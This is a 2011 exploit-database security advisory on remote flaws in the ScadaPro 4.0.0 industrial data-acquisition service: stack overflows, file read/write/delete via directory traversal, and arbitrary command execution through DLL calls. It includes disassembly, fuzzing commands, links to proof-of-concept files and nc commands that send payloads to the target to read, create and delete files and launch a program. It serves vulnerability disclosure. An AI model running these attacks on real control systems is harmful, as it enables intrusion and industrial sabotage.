Measuresoft ScadaPro 4.0.0 – Multiple Vulnerabilities

• Exploit Database
• 14 阅读

• 作者： Luigi Auriemma
  日期： 2011-09-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17844/

• #######################################################################
  
   Luigi Auriemma
  
  Application:Measuresoft ScadaPro
  http://www.measuresoft.com/products/scada-products.aspx
  Versions: <= 4.0.0
  Platforms:Windows
  Bugs: arbitrary commands execution
  directory traversal in read, write and delete mode
  tons of stack overflow vulnerabilities
  various Denial of Service vulnerabilities
  Exploitation: remote
  Date: 13 Sep 2011
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bugs
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  From vendor's website:
  "ScadaPro is Real Time Data Acquisition software for Microsoft Windows.
  Optimised to use the powerful real time, multi-tasking features of
  Windows, ScadaPro provides integrated data acquisition, monitoring,
  data logging, mimic development and report generation."
  
  
  #######################################################################
  
  =======
  2) Bugs
  =======
  
  
  service.exe is a service listening on port 11234.
  
  Initially I started to test this software as usual by checking all the
  operations performed by the various opcodes which are divided in a
  group identified by the second byte of the packet while the first one
  is the opcode for the final operation.
  The function that handles the various groups and opcodes is available
  at offset 004061F0.
  
  The problem is that there are so much security vulnerabilities and
  design problems in this service that makes non convenient to continue
  the tests so after the checking of the opcodes of the 'F' group and a
  quick scan of the others I stopped any test to avoid to waste other
  time.
  It means that there are for sure other vulnerabilities but the most
  importants (stack overflows, code execution and files access) have been
  covered in the 'F' group and the main stack overflows of all the groups
  can be catched with the simple scanner I linked in the next section.
  
  In short there are stack overflow vulnerabilities in almost all the
  supported commands and they are divided in sscanf and in-line strcpy
  functions like the following taken from the "TF" command:
  
  0040A0D9 . 8D5424 38LEA EDX,DWORD PTR SS:[ESP+38]
  0040A0DD . 52 PUSH EDX
  0040A0DE . 68 84D46700PUSH service.0067D484 ; "%s"
  0040A0E3 . 57 PUSH EDI
  0040A0E4 . E8 12F20000CALL service.004192FB ; sscanf
  ...
  0040A114 > 8D5424 20LEA EDX,DWORD PTR SS:[ESP+20]
  0040A118 . 8BC7 MOV EAX,EDI
  0040A11A . 2BD7 SUB EDX,EDI
  0040A11C . 8D6424 00LEA ESP,DWORD PTR SS:[ESP]
  0040A120 > 8A08 MOV CL,BYTE PTR DS:[EAX]
  0040A122 . 880C02 MOV BYTE PTR DS:[EDX+EAX],CL
  0040A125 . 83C0 01ADD EAX,1
  0040A128 . 84C9 TEST CL,CL
  0040A12A .^75 F4JNZ SHORT service.0040A120
  
  Obviously there are many Denial of Service bugs too.
  
  Then there is full control over the files to read and write and the
  possibility to use directory traversal attacks like in the "RF" and
  "wF" (the first char is lower because there is a check for avoiding its
  usage), example of the tab-separeted arguments:
  
  RF%
  filename
  ReadFile.nNumberOfBytesToRead
  SetFilePointer.lDistanceToMove
  SetFilePointer.dwMoveMethod
  CreateFile.dwDesiredAccess
  CreateFile.dwShareMode 
  ???
  CreateFile.dwCreationDisposition
  CreateFile.dwFlagsAndAttributes
  content if in write mode
  
  It's also possible to delete files and whole folders (included their
  files) via the "UF" and "NF" commands.
  
  Then it's possible to pass custom arguments to the backup commands like
  what happens with "BF", "OF" and "EF" while executing mszip because the
  arguments are not sanitized versus the injection of the '"' char.
  The program supports also other backup programs like tar and compress.
  
  And finally, through the "XF" command it's possible to execute an
  arbitrary function of a dll, for example the "system" one of msvcrt.dll
  for executing any desired custom command.
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip
  
  only a simple scanner:
  udpsz -d 2 -c "xx%" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  udpsz -d 2 -c "xx%test\t" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  udpsz -d 2 -c "xx%test,"-b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  
  http://aluigi.org/poc/scadapro_1.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17844-2.zip
  
  nc SERVER 11234 < scadapro_1b.dat ; read c:\boot.ini
  nc SERVER 11234 < scadapro_1c.dat ; create c:\evil_file.txt
  nc SERVER 11234 < scadapro_1d.dat ; delete c:\valid_file.txt
  nc SERVER 11234 < scadapro_1e.dat ; execute notepad
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################